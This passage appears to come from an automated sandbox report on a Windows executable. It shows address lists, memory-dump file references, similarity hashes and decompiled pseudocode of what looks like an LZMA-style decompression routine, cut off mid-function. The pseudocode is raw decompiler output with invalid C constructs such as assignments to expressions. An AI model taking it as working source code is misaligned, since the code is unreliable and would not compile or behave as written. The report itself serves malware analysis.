                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00000000
                                                                                                                    0x004068fe
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x004068bc
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406960
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406992
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a60
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                    • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                                                                                    • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                    • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
